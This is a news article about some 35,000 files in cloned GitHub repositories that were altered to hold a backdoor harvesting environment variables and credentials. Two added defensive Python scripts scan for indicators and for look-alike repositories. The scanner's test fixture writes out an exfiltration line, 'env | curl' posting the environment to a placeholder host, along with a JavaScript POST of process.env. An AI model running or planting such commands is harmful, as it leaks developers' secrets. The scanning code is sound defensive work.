35,000 codes on GitHub were cloned to spread malware – Tecnoblog


Cloning open source repositories is not an uncommon practice; in fact, it is encouraged. But an action of the kind discovered by software engineer Stephen Lacy leaves no room for good intentions: more than 35 thousand files on GitHub have been copied and tampered with to include malicious code.

Clone Troopers (illustrative image: reproduction/Lucasfilm)

Via Twitter, Lacy says he discovered the problem while reviewing the source code of a project he had found on GitHub through a Google search. During that review, he came across a link in the code that leads to malware.

Intrigued, the engineer searched for the link in other repositories. The result was surprising: the same address was found in over 35,000 files stored in repositories on GitHub.

At first, Lacy thought these repositories had been compromised in some way. He even listed a few: “crypto, golang, python, js, bash, docker and k8s”.

But it soon became clear that the affected projects were in fact clones of other repositories. The originals remained intact, including those he had mentioned.

A relief, right? Not quite. If a developer comes across one of the malicious clones, they may simply use that project without realizing that, in doing so, they are helping to spread malware. The consequences can be disastrous.

What does the malware do?

A developer named James Tucker discovered that the link leads to a backdoor which, once active, can perform arbitrary actions on the affected computer.

Among them are, presumably, instructions for collecting sensitive data, since the malicious code is also able to capture environment variables. These can include data such as API keys, cryptographic keys and Amazon Web Services credentials.

This means that any project built on one or more tampered files could expose the application to a threat from an unexpected source.
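The two things a practitioner wants to do after reading the paragraphs above are what Lacy did by hand (search a checkout for the malicious address) and what Tucker described (spot code that harvests the environment and sends it somewhere). The script below is an added example written for this article; it is not code from the article, from Stephen Lacy, James Tucker, GitHub or BleepingComputer. The indicator URL `http://malicious.example/collect` is a placeholder, because the article does not reproduce the real address, and the sample repository tree is constructed inline purely to exercise the scanner.

```python
"""Added example: sweep a checked-out tree for a known malicious indicator and
for the "dump the environment, then call out to a URL" shape described above.

The IOC URL is a placeholder (assumption); the sample tree is constructed."""
import os
import re
import tempfile

# Placeholder IOC list (assumption): swap in the real indicators you have.
IOC_URLS = ["http://malicious.example/collect"]

# Narrow heuristic for whole-environment capture, kept deliberately strict so
# that an ordinary os.environ.get("HOME") does not fire.
ENV_DUMP = re.compile(
    r"dict\(os\.environ\)|os\.environ\.items\(\)|json\.dumps\(os\.environ"
    r"|JSON\.stringify\(process\.env\)|\bos\.Environ\(\)"
    r"|(?:^|[;&|\s])(?:env|printenv)\s*\|"
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
SKIP_DIRS = {".git", "node_modules", "vendor"}
MAX_BYTES = 2_000_000  # skip huge blobs such as bundled assets


def scan_source(text, ioc_urls=IOC_URLS):
    """Return a list of (rule, detail) findings for one file's contents."""
    findings = []
    for url in ioc_urls:
        if url in text:
            findings.append(("known_ioc", url))
    if ENV_DUMP.search(text):
        urls = sorted(set(URL_RE.findall(text)))
        if urls:
            # Environment capture plus an outbound address in the same file.
            findings.append(("env_dump_and_callout", ", ".join(urls)))
    return findings


def scan_tree(root, ioc_urls=IOC_URLS):
    """Walk a repository checkout; return {relative_path: findings} for hits."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > MAX_BYTES:
                continue
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                findings = scan_source(fh.read(), ioc_urls)
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


def build_sample_tree(root):
    """Constructed fixture: one clean file, two tampered ones, one skipped dir."""
    files = {
        "main.go": "package main\n// docs: https://pkg.go.dev/fmt\nfunc main() {}\n",
        "install.sh": "#!/bin/sh\nenv | curl -s -X POST --data-binary @- "
                      "http://malicious.example/collect\n",
        "index.js": 'fetch("https://example.com/api", '
                    "{method: 'POST', body: JSON.stringify(process.env)});\n",
        os.path.join("node_modules", "dep.js"): "// http://malicious.example/collect\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the constructed fixture in a temp dir and return the scan results."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp))


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        for rule, detail in hits:
            print(f"{rel}: {rule} -> {detail}")
```

Run it against a fresh clone before you build anything from it. A `known_ioc` hit is a hard stop; an `env_dump_and_callout` hit only means a file both reads the whole environment and names a URL, so read that file before deciding (a legitimate deployment script can do the same).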

The malicious code in a file (image: Twitter/Stephen Lacy)

GitHub acted fast, but stay alert

It is important to clarify that the malicious code was found in 35 thousand files, but not in the same number of repositories. A search by BleepingComputer showed that about 13,000 of these files belonged to a single repository (redhat-operator-ecosystem), to give one example.

Fortunately, that repository was quickly removed by GitHub, as were the other problematic clones. But the episode serves as a warning. Although it is not an easy task, it is important to check the origin of a repository before using it and, of course, to give preference to official projects.

Stephen Lacy himself says that this kind of situation is the reason he does not install packages found at random on the internet.

To BleepingComputer, GitHub gave a recommendation in line with the care taken by the engineer:

As a good practice, remember to use software from the project’s official repositories and watch out for possible typos or forks/clones that may look identical to the originals, but hide malware.
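Checking a repository's origin, as the article and GitHub's recommendation both ask, can be partly automated. The script below is an added example written for this page, not code from the article, GitHub or BleepingComputer. `meta` is the JSON object the GitHub REST endpoint `GET /repos/{owner}/{repo}` returns (for example via `gh api repos/OWNER/REPO`); only its `full_name`, `fork` and `parent` fields are used. The allowlist of official projects and the sample metadata are constructed for the example, and the edit-distance threshold of 2 is an assumption.

```python
"""Added example: flag forks, exact-name clones under another owner, and
near-miss (typosquat) names before cloning or installing from a repository."""
import json

# Assumed allowlist of projects you actually mean to use (owner/name).
OFFICIAL = {"golang/go", "kubernetes/kubernetes", "docker/cli"}


def levenshtein(a, b):
    """Classic edit distance; small enough to inline rather than add a dependency."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_repo(meta, official=OFFICIAL, max_distance=2):
    """Return a list of warnings; an empty list means the repo is on the allowlist."""
    full = meta["full_name"]
    if full in official:
        return []
    warnings = []
    owner, name = full.split("/", 1)
    if meta.get("fork"):
        # A fork of the real project is still not the real project.
        parent = (meta.get("parent") or {}).get("full_name", "unknown")
        warnings.append(f"{full} is a fork of {parent}; use the upstream project")
    for off in sorted(official):
        off_owner, off_name = off.split("/", 1)
        d = levenshtein(name.lower(), off_name.lower())
        # Distance 0 with a different owner is exactly the clone case from the article.
        if d <= max_distance and off_owner != owner:
            warnings.append(f"{full}: name is {d} edit(s) from official {off}, different owner")
    if not warnings:
        warnings.append(f"{full} is not on the allowlist; verify it manually")
    return warnings


def assess_repo_json(raw, official=OFFICIAL):
    """Convenience wrapper for the raw JSON body of GET /repos/{owner}/{repo}."""
    return assess_repo(json.loads(raw), official)


# Constructed samples that mirror the shape of the GitHub API response.
SAMPLE_METADATA = [
    '{"full_name": "golang/go", "fork": false}',
    '{"full_name": "someuser/go", "fork": true, "parent": {"full_name": "golang/go"}}',
    '{"full_name": "someuser/kubernetse", "fork": false}',
    '{"full_name": "someuser/my-tool", "fork": false}',
]

if __name__ == "__main__":
    for raw in SAMPLE_METADATA:
        for line in assess_repo_json(raw) or ["ok: " + json.loads(raw)["full_name"]]:
            print(line)
```

The check is a gate, not a verdict: a repository that is neither a fork nor a look-alike can still be tampered with, which is why the allowlist is the only path that returns no warnings.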
